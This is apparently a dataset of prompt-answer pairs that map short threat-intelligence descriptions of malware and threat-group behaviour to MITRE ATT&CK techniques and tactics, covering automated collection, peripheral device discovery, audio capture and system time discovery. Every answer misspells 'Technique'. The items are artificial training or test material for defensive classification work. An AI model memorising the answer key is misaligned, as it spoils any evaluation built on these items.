+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can download a module to search for and build a report of harvested credential data.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail can identify and add files that possess specific file extensions to an array for archiving.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can be used to automatically collect files from a compromised host.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `fsutil fsinfo drives` command as part of their advanced reconnaissance.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors discovered removable disks attached to a system.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has used an executable to detect removable media, such as USB flash drives.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group tools have contained an application to check performance of USB flash drives. Gamaredon Group has also used malware to scan for removable drives.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used tools to identify if a mouse is connected to a targeted system.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has searched for attached VGA devices using lspci.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used fsutil fsinfo drives to list connected drives.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can list connected devices.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has a plugin that collects information about inserted storage devices, modems, and phone devices.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook can detect USB devices.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to steal information about printers and the documents sent to printers.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson has the ability to discover pluggable/removable drives to extract files from.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch can monitor for removable drives being plugged into the compromised machine.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can list signed PnP drivers for smartcard readers.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky can detect connected USB devices.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious can run GET.WORKSPACE in Microsoft Excel to check if a mouse is present.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy will attempt to detect if a usable smart card is current inserted into a card reader.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The FunnyDream FilepakMonitor component can detect removable drive insertion.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can identify removable media attached to victim's machines.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can identify removable media attached to compromised hosts.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind obtains the number of removable drives from the victim.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub has the ability to monitor removable drives.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can discover pluggable/removable drives to extract files from.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka collects information on available printers and disk drives.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can identify peripheral devices on targeted systems.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve can identify and search removable drives for specific file name extensions.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can obtain a list of smart card readers attached to the victim.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker may attempt to connect to removable drives and mapped network drives.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can scan for removable media which may contain documents for collection.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can check for the number of devices plugged into an infected host.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco has dropped a plugin to monitor external drives to `C:\Users\Public\It3.exe`.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet enumerates removable drives for infection.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 searches through connected drives for removable storage devices.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to identify connected Apple devices.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can scan for removable media to collect data.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can check for connected USB devices.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.","Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can enumerate removable drives prior to the encryption process.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy enumerates information about connected storage devices.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can map UPnP ports.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT will attempt to detect if the victim system has a camera during the initial infection. njRAT can also detect any removable drives connected to the system.,"Tecnique: T1120 Peripheral Device Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's has a plugin that is capable of recording audio using available input sound devices.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has modules that are capable of capturing audio.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to record audio from the compromised host.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT has a feature to perform voice recording on the victim’s machine.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can perform audio surveillance using microphones.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DOGCALL can capture microphone data from the victim's machine.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can listen in to victims' conversations through the system’s microphone.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of performing audio captures.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilGrab has the capability to capture audio from a victim machine.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame can record audio using any existing hardware recording devices.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a remote microphone monitoring capability.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can record sound using input audio devices.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Janicab captured audio and sent it out to a C2 server.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has the ability to record audio.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy can record the sounds from microphones on a computer.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete captures audio from the computer’s microphone.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia can perform microphone recording.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore can capture audio feeds from the system.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can load a module to leverage the LAME encoder and `mciSendStringW` to control and capture audio.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Get-MicrophoneAudio Exfiltration module can record system microphone audio.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can record sound with the microphone.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT has an audio capture and eavesdropping module.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos can capture data from the system’s microphone.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT has a plugin for microphone interception.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\Intel\Skype.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to capture VoiceIP application audio on an infected host.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN can perform audio capture.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can capture microphone recordings.,"Tecnique: T1123 Audio Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net time` command as part of their advanced reconnaissance.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used the `time` command to retrieve the current time of a compromised system.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used net time to check the local time on a target system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used time /t and net time \\ip/hostname for system time discovery.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel malware can obtain system time from a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used a function to gather the current time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used tools to obtain the current system time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The White Company has checked the current date on the victim system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover the system time by using the net time command.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can collect the timestamp from the victim’s machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can pull a timestamp from the victim's machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth collects the timestamp from the infected machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has checked the system time before and after encryption.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can collect the time zone information from the system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can obtain the `DATETIME` and `UPTIME` from a compromised machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT has a command to collect the system `UPTIME`.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can collect the local time on a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can collect the time on the compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear has the ability to determine local time on a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal can check the system time set on the infected host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon can collect the current time zone information from the victim’s machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon uses the command net time \\127.0.0.1 to get information the system’s time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can determine the current time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson has the ability to determine the date and time on a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv can compare the current time on an infected host with a configuration value to determine when to start the encryption process.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate creates a log file for capturing keylogging, clipboard, and related data using the victim host's current date for the filename. DarkGate queries victim system epoch time during execution. DarkGate captures system time information as part of automated profiling on initial installation.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can collect time zone information and system `UPTIME`.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor contains functionality to query the local/system time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses the net time command to get the system time from the machine and collect the current date and time zone information.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT gathers the time zone information from the victim’s machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can check system time to help determine when changes were made to specified files.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can determine the time on the victim machine via IPinfo.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT can obtain the date and time of a system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can collect the date and time from a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has been observed collecting system time from victim machines.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole gathers the local system time from the victim’s machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYPLUG can obtain the current tick count of an infected computer.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo uses JavaScript to get the system time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind obtains the victim's current time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI can collect the current timestamp of the victim's machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net time command can be used in Net to determine the local or remote system time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can obtain the date and time of the compromised system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE checks to see if the system is configured with ""Daylight"" time and checks for a specific region to be set for the timezone.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can send time zone information from a compromised host to C2.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has commands to get the time the machine was built, the time, and the time zone.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: As part of the data reconnaissance phase, Proxysvc grabs the system time to send back to the control server.","Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can identify the system time on a targeted host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can obtain the victim time zone.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHARPSTATS has the ability to identify the current date and time on the compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can collect start time information from a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected device `UPTIME`.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can collect time zone information.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has collected the current date and time of the victim system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon obtains the system time and will only activate if it is greater than a preset date.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can execute getinfo to discover the current time on a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill can obtain the current date and time of the victim machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can collect the time zone from the victim's machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet collects the time and date of a system when it is infected.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 gathers and beacons the system time during installation.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can execute GetLocalTime for time discovery.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can use GetLocalTime and GetSystemTime to collect system time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to determine local time on a compromised host.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma can collect the current time on a victim machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT has the capability to obtain the time zone information and current timestamp of the victim’s machine.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has the ability to generate the current date and time.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy gathers the current time zone and date information from the system.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
